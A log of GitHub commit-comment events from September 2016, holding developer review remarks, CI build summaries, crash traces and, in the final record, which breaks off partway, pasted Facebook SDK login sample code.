{"id":"4524154279","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":18919445,"position":null,"line":null,"path":null,"commit_id":"535642c62ff0e87172a736fb42365557320c6856","created_at":"2016-09-06T21:55:54Z","updated_at":"2016-09-06T21:55:54Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.247.535642c62ff0e87172a736fb42365557320c6856](http://build.palaso.org/viewLog.html?buildId=76488&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1496, ignored: 17 Build time: 00:07:21"}},"created_at":"2016-09-06T21:55:54Z"}
{"id":"4524155590","type":"CommitCommentEvent","actor":{"login":"silver13"},"repo":{"name":"silver13/h8mini-testing"},"payload":{"comment":{"id":18919448,"position":null,"line":null,"path":null,"commit_id":"d6363393b38ed5029911a9a3e2a1fc309cfe7088","created_at":"2016-09-06T21:56:11Z","updated_at":"2016-09-06T21:56:11Z","body":"you would send data using advertising packets, with a custom field that includes the whole xn297 packet.\r\n\r\nSo it would not be bluetooth send, just xn297 ( or nrf24) compatible\r\n\r\nUsing the nrf app you view the data in the first tab. Can't connect to it."}},"created_at":"2016-09-06T21:56:11Z"}
{"id":"4524156803","type":"CommitCommentEvent","actor":{"login":"ginajimenezc"},"repo":{"name":"ginajimenezc/Curriculum-Vitae"},"payload":{"comment":{"id":18919452,"position":2,"line":2,"path":"README.md","commit_id":"2114898e10f647f3205e40a069a20a2fe2fce9f9","created_at":"2016-09-06T21:56:25Z","updated_at":"2016-09-06T21:56:25Z","body":"FFFFF"}},"created_at":"2016-09-06T21:56:25Z"}
{"id":"4524158118","type":"CommitCommentEvent","actor":{"login":"jakemager"},"repo":{"name":"kimtracy/TSPFall2016"},"payload":{"comment":{"id":18919458,"position":null,"line":null,"path":null,"commit_id":"ee13d9ad3a1efc0ab7096587859b62c3daa9e647","created_at":"2016-09-06T21:56:42Z","updated_at":"2016-09-06T21:56:42Z","body":"Added information on Jake Mager"}},"created_at":"2016-09-06T21:56:42Z"}
{"id":"4524159206","type":"CommitCommentEvent","actor":{"login":"rubo77"},"repo":{"name":"Freemesh-Denmark/puppet-config-aarhus"},"payload":{"comment":{"id":18919464,"position":null,"line":null,"path":null,"commit_id":"ab504d1717985f8fd009de0968bb0692c114013e","created_at":"2016-09-06T21:56:55Z","updated_at":"2016-09-06T21:56:55Z","body":"nginx is needed if you want to serve the firmware for the auto-updater"}},"created_at":"2016-09-06T21:56:55Z"}
{"id":"4524163419","type":"CommitCommentEvent","actor":{"login":"flibijuan"},"repo":{"name":"flibijuan/meteor"},"payload":{"comment":{"id":18919475,"position":null,"line":null,"path":null,"commit_id":"01dbfe65425b1728c0bf5ece54998df025e51c80","created_at":"2016-09-06T21:57:48Z","updated_at":"2016-09-06T21:57:48Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;T6KgNp2R&#x2F;1-hg\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> hg</a>"}},"created_at":"2016-09-06T21:57:48Z"}
{"id":"4524164240","type":"CommitCommentEvent","actor":{"login":"xomaczar"},"repo":{"name":"miguelcobain/ember-paper"},"payload":{"comment":{"id":18919477,"position":null,"line":null,"path":null,"commit_id":"3c1a56cd367da321663ea82d0c5e168de0fd0e36","created_at":"2016-09-06T21:57:59Z","updated_at":"2016-09-06T21:57:59Z","body":"Sounds good. We need to integrate this highlight component into autocomplete next."}},"created_at":"2016-09-06T21:57:59Z"}
{"id":"4524164577","type":"CommitCommentEvent","actor":{"login":"ksooo"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18919478,"position":null,"line":null,"path":null,"commit_id":"2cb1ef00750dd07e73c18bfe1fe3f7ddae9628fb","created_at":"2016-09-06T21:58:04Z","updated_at":"2016-09-06T21:58:04Z","body":"@wsnipex for me, this change causes a crash on kodi startup:\r\n\r\n<pre>\r\n(lldb) thread backtrace\r\n* thread #1: tid = 0x85909, 0x00007fff996bff06 libsystem_kernel.dylib`__pthread_kill + 10, queue = 'com.apple.main-thread', stop reason = signal SIGABRT\r\n    frame #0: 0x00007fff996bff06 libsystem_kernel.dylib`__pthread_kill + 10\r\n    frame #1: 0x0000000106ca742d libsystem_pthread.dylib`pthread_kill + 90\r\n    frame #2: 0x00007fff9b0146df libsystem_c.dylib`abort + 129\r\n    frame #3: 0x00007fff9afdbdd8 libsystem_c.dylib`__assert_rtn + 321\r\n    frame #4: 0x0000000100c1e35a Kodi`CSpecialProtocol::GetPath(key=\"xbmcaltbinaddons\") + 650 at SpecialProtocol.cpp:292\r\n  * frame #5: 0x0000000100c25a75 Kodi`CSpecialProtocol::LogPaths() + 1797 at SpecialProtocol.cpp:268\r\n    frame #6: 0x000000010001289e Kodi`CApplication::Create(this=0x0000000109801000) + 17038 at Application.cpp:593\r\n    frame #7: 0x00000001002ecb3e Kodi`::XBMC_Run(renderGUI=true) + 110 at xbmc.cpp:52\r\n    frame #8: 0x00000001004196f4 Kodi`::SDL_main(argc=1, argv=0x0000000106e490d0) + 292 at main.cpp:79\r\n    frame #9: 0x000000010017dd99 Kodi`main(argc=1, argv=0x00007fff5fbff780) + 745 at SDLMain.mm:575\r\n    frame #10: 0x00007fff9ea4f5ad libdyld.dylib`start + 1\r\n</pre>"}},"created_at":"2016-09-06T21:58:04Z"}
{"id":"4524165621","type":"CommitCommentEvent","actor":{"login":"miguelcobain"},"repo":{"name":"miguelcobain/ember-paper"},"payload":{"comment":{"id":18919479,"position":null,"line":null,"path":null,"commit_id":"dde1efc2b9937db456ca45b890bfc7e1a6593dd0","created_at":"2016-09-06T21:58:17Z","updated_at":"2016-09-06T21:58:17Z","body":"So, you're basically suggesting to use `class=\"flex\"` instead of `triggerClass=\"flex\"`.\r\nThere's an argument in favor of `triggerClass` which is the resemblance of ember-power-select.\r\n\r\nTo be honest, e feel eps api is not as versatile as ebd. So, let's discuss this again when we merge into master. I have some ideas to make eps api more like ebd and would like to discuss with cibernox as well."}},"created_at":"2016-09-06T21:58:17Z"}
{"id":"4524169454","type":"CommitCommentEvent","actor":{"login":"flibijuan"},"repo":{"name":"flibijuan/meteor"},"payload":{"comment":{"id":18919486,"position":null,"line":null,"path":null,"commit_id":"01dbfe65425b1728c0bf5ece54998df025e51c80","created_at":"2016-09-06T21:59:06Z","updated_at":"2016-09-06T21:59:06Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;T6KgNp2R&#x2F;1-hg\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> hg</a>"}},"created_at":"2016-09-06T21:59:06Z"}
{"id":"4524169684","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18919487,"position":null,"line":null,"path":null,"commit_id":"e9249abc83f4b2ba0182ac3150115eccb5873461","created_at":"2016-09-06T21:59:09Z","updated_at":"2016-09-06T21:59:09Z","body":"#5770-User-file-generating-many-fancoil-max-iteration-warnings (rraustad) - x86_64-MacOS-10.9-clang: OK (2322 of 2328 tests passed, 0 test warnings)\n\n * 6 tests had: EIO diffs.\n * 5 tests had: ESO big diffs.\n * 6 tests had: Table big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: ESO small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9249abc83f4b2ba0182ac3150115eccb5873461-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e9249abc83f4b2ba0182ac3150115eccb5873461-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.74%25-yellow.svg)</a> \n"}},"created_at":"2016-09-06T21:59:09Z"}
{"id":"4524170230","type":"CommitCommentEvent","actor":{"login":"thopiekar"},"repo":{"name":"thopiekar/Cura"},"payload":{"comment":{"id":18919488,"position":null,"line":null,"path":null,"commit_id":"02fd71fe58154bb46d5deba413b26c8c385e45ab","created_at":"2016-09-06T21:59:16Z","updated_at":"2016-09-06T21:59:16Z","body":"Hey Bob,\n\nLinuxMint has been added to Cura 2.3, which will be out in my PPA approx at\nthe end of the week.\nMy own copy of Cura here in my fork is often out to date. Checkout the main\nrepository at Ultimaker/Cura. I moved the NVidia workaround into\ncura_app.py with all the other workarounds.\n\nMit freundlichen Grüßen/With kind regards\n- Thomas Karl Pietrowski\n"}},"created_at":"2016-09-06T21:59:16Z"}
{"id":"4524171977","type":"CommitCommentEvent","actor":{"login":"adc-chuang"},"repo":{"name":"carlos-sarmiento/retail"},"payload":{"comment":{"id":18919491,"position":23,"line":23,"path":"src/main/java/com/tenx/ms/retail/retail/domain/OrderEntity.java","commit_id":"f994781d18ad1cfc398aeeb7d22b6c58f166fb58","created_at":"2016-09-06T21:59:36Z","updated_at":"2016-09-06T21:59:36Z","body":"We typically use `Long` for the primary key type."}},"created_at":"2016-09-06T21:59:36Z"}
{"id":"4524179654","type":"CommitCommentEvent","actor":{"login":"xomaczar"},"repo":{"name":"miguelcobain/ember-paper"},"payload":{"comment":{"id":18919506,"position":null,"line":null,"path":null,"commit_id":"3c1a56cd367da321663ea82d0c5e168de0fd0e36","created_at":"2016-09-06T22:01:05Z","updated_at":"2016-09-06T22:01:05Z","body":"You don't like the module names that ember-cli-shims exports? Seems like power-select has switched."}},"created_at":"2016-09-06T22:01:05Z"}
{"id":"4524181940","type":"CommitCommentEvent","actor":{"login":"xomaczar"},"repo":{"name":"miguelcobain/ember-paper"},"payload":{"comment":{"id":18919512,"position":null,"line":null,"path":null,"commit_id":"3c1a56cd367da321663ea82d0c5e168de0fd0e36","created_at":"2016-09-06T22:01:33Z","updated_at":"2016-09-06T22:01:33Z","body":"I agree this should be a separate PR, if we decide to move."}},"created_at":"2016-09-06T22:01:33Z"}
{"id":"4524183737","type":"CommitCommentEvent","actor":{"login":"iFloris"},"repo":{"name":"scottalanmiller/xenorchestra_installer"},"payload":{"comment":{"id":18919519,"position":null,"line":null,"path":null,"commit_id":"882a0d47320231a1478463d6ea204ee1715e1ceb","created_at":"2016-09-06T22:01:55Z","updated_at":"2016-09-06T22:01:55Z","body":"Cool, now the script works reliably on a fresh current ubuntu server install (16.04.1 LTS)"}},"created_at":"2016-09-06T22:01:55Z"}
{"id":"4524185254","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"B--B/Ramdisk"},"payload":{"comment":{"id":18919521,"position":null,"line":null,"path":null,"commit_id":"46bd8fb3f298ea75051cd7bd25ab17a59a7b65ca","created_at":"2016-09-06T22:02:14Z","updated_at":"2016-09-06T22:02:14Z","body":"A couple of consideration about busybox - ROM tuning service separation:\r\n\r\n1 The previous implementation was wrong, basically we were trying to execute an executable (busybox) that does not have (yet) proper permissions. This works on MM/LP in permissive mode, but fails in N and probably in enforcing mode, because the script cannot be executed. Now busybox is fully installed in late_start class and script should work in enforcing mode too\r\n2 This change in order to work need something similar on rom side: https://github.com/AOSP-JF-MM/platform_device_samsung_jflte/commit/ca517c1d5e053cde679ad6f2f72f1623f4f8191e or add the same changes to the kernel installation script\r\n3 Should be ported on MM too, i will take a look in next days as Alucard kernel works well in MM even without this so it's not urgent"}},"created_at":"2016-09-06T22:02:14Z"}
{"id":"4524189617","type":"CommitCommentEvent","actor":{"login":"richardwu"},"repo":{"name":"richardwu/news_scraper"},"payload":{"comment":{"id":18919532,"position":51,"line":51,"path":"lib/news_scraper/trainer/uri_trainer.rb","commit_id":"2f7dd7ffd79700fc12bb517e4b70c21f65395833","created_at":"2016-09-06T22:03:11Z","updated_at":"2016-09-06T22:03:11Z","body":"Why return here?"}},"created_at":"2016-09-06T22:03:11Z"}
{"id":"4524190537","type":"CommitCommentEvent","actor":{"login":"xomaczar"},"repo":{"name":"miguelcobain/ember-paper"},"payload":{"comment":{"id":18919538,"position":null,"line":null,"path":null,"commit_id":"dde1efc2b9937db456ca45b890bfc7e1a6593dd0","created_at":"2016-09-06T22:03:21Z","updated_at":"2016-09-06T22:03:21Z","body":"No problem, let's fix other things first, we can discuss that later."}},"created_at":"2016-09-06T22:03:21Z"}
{"id":"4524202149","type":"CommitCommentEvent","actor":{"login":"jules2689"},"repo":{"name":"richardwu/news_scraper"},"payload":{"comment":{"id":18919572,"position":51,"line":51,"path":"lib/news_scraper/trainer/uri_trainer.rb","commit_id":"2f7dd7ffd79700fc12bb517e4b70c21f65395833","created_at":"2016-09-06T22:05:54Z","updated_at":"2016-09-06T22:05:54Z","body":"woops, I think that was supposed to be in the `else`... we dont want to automate \"TODO\"s "}},"created_at":"2016-09-06T22:05:54Z"}
{"id":"4524210922","type":"CommitCommentEvent","actor":{"login":"lihanli"},"repo":{"name":"department-of-veterans-affairs/vets-api"},"payload":{"comment":{"id":18919597,"position":2,"line":1,"path":"app/vets-json-schema","commit_id":"edb3ef6a05e9aad06f735daf8b4c16efc1588fda","created_at":"2016-09-06T22:07:45Z","updated_at":"2016-09-06T22:07:45Z","body":"this was an older commit"}},"created_at":"2016-09-06T22:07:45Z"}
{"id":"4524211112","type":"CommitCommentEvent","actor":{"login":"trevordmiller"},"repo":{"name":"trevordmiller/nova-hyperterm"},"payload":{"comment":{"id":18919598,"position":null,"line":null,"path":null,"commit_id":"531f9ee4e2f1104d10a3e57c69a48962d12b1019","created_at":"2016-09-06T22:07:47Z","updated_at":"2016-09-06T22:07:47Z","body":"![screen shot 2016-09-06 at 4 05 59 pm](https://cloud.githubusercontent.com/assets/5497885/18292741/0a9a1e12-744c-11e6-9b04-86e99effdeeb.png)\r\n"}},"created_at":"2016-09-06T22:07:47Z"}
{"id":"4524236792","type":"CommitCommentEvent","actor":{"login":"LewisMcReu"},"repo":{"name":"BubbleTrouble14/ARKCraft"},"payload":{"comment":{"id":18919670,"position":null,"line":null,"path":null,"commit_id":"2c8c43c484bbce244a34a656782a60dfb7ace7e0","created_at":"2016-09-06T22:13:27Z","updated_at":"2016-09-06T22:13:27Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;12n5lsFd&#x2F;115-campfire-forge-unification\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Campfire &amp; Forge unification</a>"}},"created_at":"2016-09-06T22:13:27Z"}
{"id":"4524237159","type":"CommitCommentEvent","actor":{"login":"LewisMcReu"},"repo":{"name":"BubbleTrouble14/ARKCraft"},"payload":{"comment":{"id":18919675,"position":null,"line":null,"path":null,"commit_id":"ae1a39f40a5d399ea459f621536f4dcf5f382481","created_at":"2016-09-06T22:13:32Z","updated_at":"2016-09-06T22:13:32Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;12n5lsFd&#x2F;115-campfire-forge-unification\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Campfire &amp; Forge unification</a>"}},"created_at":"2016-09-06T22:13:32Z"}
{"id":"4524237526","type":"CommitCommentEvent","actor":{"login":"LewisMcReu"},"repo":{"name":"BubbleTrouble14/ARKCraft"},"payload":{"comment":{"id":18919676,"position":null,"line":null,"path":null,"commit_id":"f52f5833b08ec16e7a30243e7bcfcd585635126a","created_at":"2016-09-06T22:13:37Z","updated_at":"2016-09-06T22:13:37Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;12n5lsFd&#x2F;115-campfire-forge-unification\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Campfire &amp; Forge unification</a>"}},"created_at":"2016-09-06T22:13:37Z"}
{"id":"4524237811","type":"CommitCommentEvent","actor":{"login":"LewisMcReu"},"repo":{"name":"BubbleTrouble14/ARKCraft"},"payload":{"comment":{"id":18919678,"position":null,"line":null,"path":null,"commit_id":"e63e235bde90122b4eea7d05b3b0ab25ccea950b","created_at":"2016-09-06T22:13:41Z","updated_at":"2016-09-06T22:13:41Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;12n5lsFd&#x2F;115-campfire-forge-unification\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Campfire &amp; Forge unification</a>"}},"created_at":"2016-09-06T22:13:41Z"}
{"id":"4524237948","type":"CommitCommentEvent","actor":{"login":"LewisMcReu"},"repo":{"name":"BubbleTrouble14/ARKCraft"},"payload":{"comment":{"id":18919679,"position":null,"line":null,"path":null,"commit_id":"7d2211f1f4a99f934ab682785d7b7b41050bb186","created_at":"2016-09-06T22:13:44Z","updated_at":"2016-09-06T22:13:44Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;12n5lsFd&#x2F;115-campfire-forge-unification\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Campfire &amp; Forge unification</a>"}},"created_at":"2016-09-06T22:13:44Z"}
{"id":"4524240096","type":"CommitCommentEvent","actor":{"login":"tractorcow"},"repo":{"name":"silverstripe/silverstripe-framework"},"payload":{"comment":{"id":18919685,"position":4,"line":305,"path":"control/HTTP.php","commit_id":"56f0b72e8dbf5b7205ae12c80e0f4c9a0614d1a2","created_at":"2016-09-06T22:14:12Z","updated_at":"2016-09-06T22:14:12Z","body":"oops, strpos with one arg? "}},"created_at":"2016-09-06T22:14:12Z"}
{"id":"4524241506","type":"CommitCommentEvent","actor":{"login":"christian-storm"},"repo":{"name":"opencog/link-grammar"},"payload":{"comment":{"id":18919695,"position":null,"line":null,"path":null,"commit_id":"74f421656e6b285a4410f6e6f0b0fabbae11bf5e","created_at":"2016-09-06T22:14:32Z","updated_at":"2016-09-06T22:14:32Z","body":"This is breaking my build on MacOS:\r\n\r\nIn file included from ../../link-grammar/corpus/corpus.h:16:\r\n../../link-grammar/corpus/../utilities.h:172:13: error: typedef redefinition with different types ('int' vs 'struct _xlocale *')\r\ntypedef int locale_t;\r\n            ^\r\n/usr/include/xlocale.h:34:28: note: previous definition is here\r\ntypedef struct _xlocale *               locale_t;"}},"created_at":"2016-09-06T22:14:32Z"}
{"id":"4524242901","type":"CommitCommentEvent","actor":{"login":"RonaldKepken"},"repo":{"name":"sultanxda/proprietary_vendor_oneplus"},"payload":{"comment":{"id":18919699,"position":null,"line":null,"path":null,"commit_id":"a1eea9a2beff967f040d9acc4ffb63876ce00bae","created_at":"2016-09-06T22:14:51Z","updated_at":"2016-09-06T22:14:51Z","body":"Hey Sultan! \r\nI hope I am not disturbing you. I would like to ask on the technical details\r\nof the changes to the Camera HAL. Did you just build the vanilla HAL from CAF or did you do modifications? \r\nI am interested on the technical side of this, since we are studying this at university right now. \r\nI really hope it's no secret, since it would be really helpful to understand how you achieve these improvements. \r\nI will probably make a presentation about it.\r\nI can fully understand that you may not want to share it here in public. \r\nIf so, just quickly say that and I'll find another way to contact you in private. \r\n\r\nThank you very much in advance! I am looking forward to learning from you :) \r\n\r\nRonald Kepken"}},"created_at":"2016-09-06T22:14:51Z"}
{"id":"4524256049","type":"CommitCommentEvent","actor":{"login":"miguelcobain"},"repo":{"name":"miguelcobain/ember-paper"},"payload":{"comment":{"id":18919744,"position":null,"line":null,"path":null,"commit_id":"3c1a56cd367da321663ea82d0c5e168de0fd0e36","created_at":"2016-09-06T22:17:49Z","updated_at":"2016-09-06T22:17:49Z","body":"I don't like them. When I see `import computed from 'ember-computed';` I feel like I'm importing an ember addon or something.\r\nI've seen other better alternatives mentioned and I hope we agree on one of them somewhere in a near future."}},"created_at":"2016-09-06T22:17:49Z"}
{"id":"4524256466","type":"CommitCommentEvent","actor":{"login":"trevordmiller"},"repo":{"name":"trevordmiller/nova-hyperterm"},"payload":{"comment":{"id":18919746,"position":null,"line":null,"path":null,"commit_id":"531f9ee4e2f1104d10a3e57c69a48962d12b1019","created_at":"2016-09-06T22:17:55Z","updated_at":"2016-09-06T22:17:55Z","body":"Related PR for `nova-iterm`: https://github.com/trevordmiller/nova-iterm/pull/4"}},"created_at":"2016-09-06T22:17:55Z"}
{"id":"4524259251","type":"CommitCommentEvent","actor":{"login":"Masssly"},"repo":{"name":"Masssly/python-practice"},"payload":{"comment":{"id":18919756,"position":null,"line":null,"path":null,"commit_id":"b55a96cab894f50fea0fb6ac8bc956299289e5c2","created_at":"2016-09-06T22:18:37Z","updated_at":"2016-09-06T22:18:37Z","body":"https://github.com/cjschilling/Coding-Exercises/blob/master/StringsExercise3.py"}},"created_at":"2016-09-06T22:18:37Z"}
{"id":"4524267332","type":"CommitCommentEvent","actor":{"login":"mikeadkison"},"repo":{"name":"asiudhgfiuashgiuashg/fantasy-coop-game"},"payload":{"comment":{"id":18919780,"position":null,"line":null,"path":null,"commit_id":"60affa9395ef30047b0075e4033a4f45f2d4cd08","created_at":"2016-09-06T22:20:33Z","updated_at":"2016-09-06T22:20:33Z","body":"loads of code (y)"}},"created_at":"2016-09-06T22:20:33Z"}
{"id":"4524270969","type":"CommitCommentEvent","actor":{"login":"shaneehlert"},"repo":{"name":"shaneehlert/Home-Team-Page"},"payload":{"comment":{"id":18919792,"position":null,"line":null,"path":null,"commit_id":"b034e8104527d4bdf97b23bb186725c572460488","created_at":"2016-09-06T22:21:24Z","updated_at":"2016-09-06T22:21:24Z","body":"image"}},"created_at":"2016-09-06T22:21:24Z"}
{"id":"4524275317","type":"CommitCommentEvent","actor":{"login":"collinL34"},"repo":{"name":"collinL34/phase-0-tracks"},"payload":{"comment":{"id":18919814,"position":null,"line":null,"path":null,"commit_id":"67faea065f1078b8bc3cf84c5186eebdb5569f94","created_at":"2016-09-06T22:22:23Z","updated_at":"2016-09-06T22:22:23Z","body":"@gmmowry: Heres the link to the new revision glenna thanks for checking on it again and giving me more feedback. (https://github.com/collinL34/phase-0-tracks/blob/master/ruby/vampires.rb)"}},"created_at":"2016-09-06T22:22:23Z"}
{"id":"4524276408","type":"CommitCommentEvent","actor":{"login":"kyle-ch"},"repo":{"name":"kyle-ch/easy-fill"},"payload":{"comment":{"id":18919827,"position":4,"line":4,"path":"README.md","commit_id":"397526c5babc84fc3628ff631d69b622418078ea","created_at":"2016-09-06T22:22:38Z","updated_at":"2016-09-06T22:22:38Z","body":"Currently only works on Footlocker, Footaction, Champs, Eastbay, and Supreme. Functionality on more sites coming soon."}},"created_at":"2016-09-06T22:22:38Z"}
{"id":"4524280100","type":"CommitCommentEvent","actor":{"login":"linas"},"repo":{"name":"hansonrobotics/HEAD"},"payload":{"comment":{"id":18919858,"position":null,"line":null,"path":null,"commit_id":"496fe839f456935c1ddd56453c65177d99e5f360","created_at":"2016-09-06T22:23:30Z","updated_at":"2016-09-06T22:23:30Z","body":"This is for issue #205"}},"created_at":"2016-09-06T22:23:30Z"}
{"id":"4524280322","type":"CommitCommentEvent","actor":{"login":"akien-mga"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":18919859,"position":null,"line":null,"path":null,"commit_id":"23ababdcd57079182172b1c5467fcd6bb0f303d3","created_at":"2016-09-06T22:23:34Z","updated_at":"2016-09-06T22:23:34Z","body":"There's a ton of stuff unrelated to your commit log here :)"}},"created_at":"2016-09-06T22:23:34Z"}
{"id":"4524294222","type":"CommitCommentEvent","actor":{"login":"bcamper"},"repo":{"name":"tangrams/tangram"},"payload":{"comment":{"id":18919915,"position":40,"line":532,"path":"src/styles/points/points.js","commit_id":"33f8c6d8904e57ecd69c96375d287abce4247dfd","created_at":"2016-09-06T22:26:53Z","updated_at":"2016-09-06T22:26:53Z","body":"It's still valid to set an `angle` in the scene file! But maybe we need a new value like `angle: auto` or something to indicate it should follow the orientation of the geometry. This would be backwards compatible with our current point placement, where no specification of `angle` in the scene means the sprite is kept upright (same as `angle: 0`)."}},"created_at":"2016-09-06T22:26:53Z"}
{"id":"4524297083","type":"CommitCommentEvent","actor":{"login":"nqpz"},"repo":{"name":"dklollol/newton"},"payload":{"comment":{"id":18919928,"position":null,"line":null,"path":null,"commit_id":"29c2cea88358cb2dd81df67bba7a16166645aec8","created_at":"2016-09-06T22:27:34Z","updated_at":"2016-09-06T22:27:34Z","body":"'Søren Hauberg' er forresten mig.  Eller, det er navnet på ham der installerede Ubuntu-VM'en i sin tid, og så tog git bare hans navn."}},"created_at":"2016-09-06T22:27:34Z"}
{"id":"4524299972","type":"CommitCommentEvent","actor":{"login":"dhensby"},"repo":{"name":"silverstripe/silverstripe-framework"},"payload":{"comment":{"id":18919955,"position":4,"line":305,"path":"control/HTTP.php","commit_id":"56f0b72e8dbf5b7205ae12c80e0f4c9a0614d1a2","created_at":"2016-09-06T22:28:15Z","updated_at":"2016-09-06T22:28:15Z","body":"how the..."}},"created_at":"2016-09-06T22:28:15Z"}
{"id":"4524301279","type":"CommitCommentEvent","actor":{"login":"atutor"},"repo":{"name":"atutor/pdf_converter"},"payload":{"comment":{"id":18919961,"position":5,"line":6,"path":"side_menu.inc.php","commit_id":"71010829f0f43759650d68174d726fd97f4ceb1a","created_at":"2016-09-06T22:28:33Z","updated_at":"2016-09-06T22:28:33Z","body":"This absolute path breaks when ATutor is **not** located in the server's document root, but rather in a subdirectory of the document root. e.g.  http://localhost/atutor\r\n\r\nAlso, the \"//global $savant\" line should probably be uncommented"}},"created_at":"2016-09-06T22:28:33Z"}
{"id":"4524302592","type":"CommitCommentEvent","actor":{"login":"bjfish"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":18919966,"position":6,"line":0,"path":"truffle/src/main/ruby/core/io.rb","commit_id":"d4a8f66619dff48776aa680df4775e24341a2331","created_at":"2016-09-06T22:28:52Z","updated_at":"2016-09-06T22:28:52Z","body":"@eregon Fixed at affe1ce38f5e0ba7901d97cfb71a4933ba09f09d, thanks!"}},"created_at":"2016-09-06T22:28:52Z"}
{"id":"4524311028","type":"CommitCommentEvent","actor":{"login":"gcrev93"},"repo":{"name":"MachUpskillingFY17/JabbR-Core"},"payload":{"comment":{"id":18919995,"position":null,"line":null,"path":null,"commit_id":"23fe0b2cdaa2b259b8cc734e1b3aae46e0dd8bc7","created_at":"2016-09-06T22:30:52Z","updated_at":"2016-09-06T22:30:52Z","body":"The additional .vscode files are from the macbook. will anyone else be working on a mac or should I delete?"}},"created_at":"2016-09-06T22:30:52Z"}
{"id":"4524314469","type":"CommitCommentEvent","actor":{"login":"tamarazuk"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":18920002,"position":null,"line":null,"path":null,"commit_id":"e2d206421d8b47adc622e4e56d72e939da48ca71","created_at":"2016-09-06T22:31:37Z","updated_at":"2016-09-06T22:31:37Z","body":"@claudiosmweb do you recall why this change was made? We have a couple of tickets we're currently investigating of gateways rejecting `123451234` zips that really should be formatted as `12345-1234` and i'd just like to know why this was removed and if you plan on bringing back correct US \"plus 4\" formatting :) Thanks 🍻 "}},"created_at":"2016-09-06T22:31:37Z"}
{"id":"4524322703","type":"CommitCommentEvent","actor":{"login":"chatpic"},"repo":{"name":"chatpic/amigos"},"payload":{"comment":{"id":18920027,"position":null,"line":null,"path":null,"commit_id":"6fc5e35fa3dbe92387b775144fcae2aabd6e9606","created_at":"2016-09-06T22:33:37Z","updated_at":"2016-09-06T22:33:37Z","body":"<p>&nbsp&nbsp</p>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<script>\r\n\r\n // This is called with the results from from FB.getLoginStatus().\r\n  function statusChangeCallback(response) {\r\n    console.log('statusChangeCallback');\r\n    console.log(response);\r\n    // The response object is returned with a status field that lets the\r\n    // app know the current login status of the person.\r\n    // Full docs on the response object can be found in the documentation\r\n    // for FB.getLoginStatus().\r\n    if (response.status === 'connected') {\r\n      // Logged into your app and Facebook.\r\n      testAPI();\r\n    } else if (response.status === 'not_authorized') {\r\n      // The person is logged into Facebook, but not your app.\r\n      document.getElementById('status').innerHTML = 'Porfavor, haga click en \"Log In\" ' +\r\n        'para usar esta AplicaciÃ³n.';\r\n    } else {\r\n      // The person is not logged into Facebook, so we're not sure if\r\n      // they are logged into this app or not.\r\n      document.getElementById('status').innerHTML = 'Please log ' +\r\n        'into Facebook.';\r\n    }\r\n  }\r\n\r\n  // This function is called when someone finishes with the Login\r\n  // Button.  See the onlogin handler attached to it in the sample\r\n  // code below.\r\n  function checkLoginState() {\r\n    FB.getLoginStatus(function(response) {\r\n      statusChangeCallback(response);\r\n    });\r\n  }\r\n\r\nwindow.fbAsyncInit = function() {\r\n  FB.init({\r\n    appId      : '1644038375825417',\r\n    cookie     : true,  // enable cookies to allow the server to access \r\n                        // the session\r\n    xfbml      : true,  // parse social plugins on this page\r\n    version    : 'v2.2' // use version 2.2\r\n  });\r\n\r\n  // Now that we've initialized the JavaScript SDK, we call \r\n  // FB.getLoginStatus().  This function gets the state of the\r\n  // person visiting this page and can return one of three states to\r\n  // the callback you provide.  They can be:\r\n  //\r\n  // 1. Logged into your app ('connected')\r\n  // 2. Logged into Facebook, but not your app ('not_authorized')\r\n  // 3. Not logged into Facebook and can't tell if they are logged into\r\n  //    your app or not.\r\n  //\r\n  // These three cases are handled in the callback function.\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nfunction onLogin(response) {\r\n    \t  if (response.status == 'connected') {\r\n\t\t\tFB.api('/me?scope=name,first_name,gender,email,birthday,location,relationship_status', function(data) {\r\n\t\t  \t   //$(\"#fb-welcome\").html(response.first_name +' '+ response.gender +' '+ response.email);\r\n\t\t\t  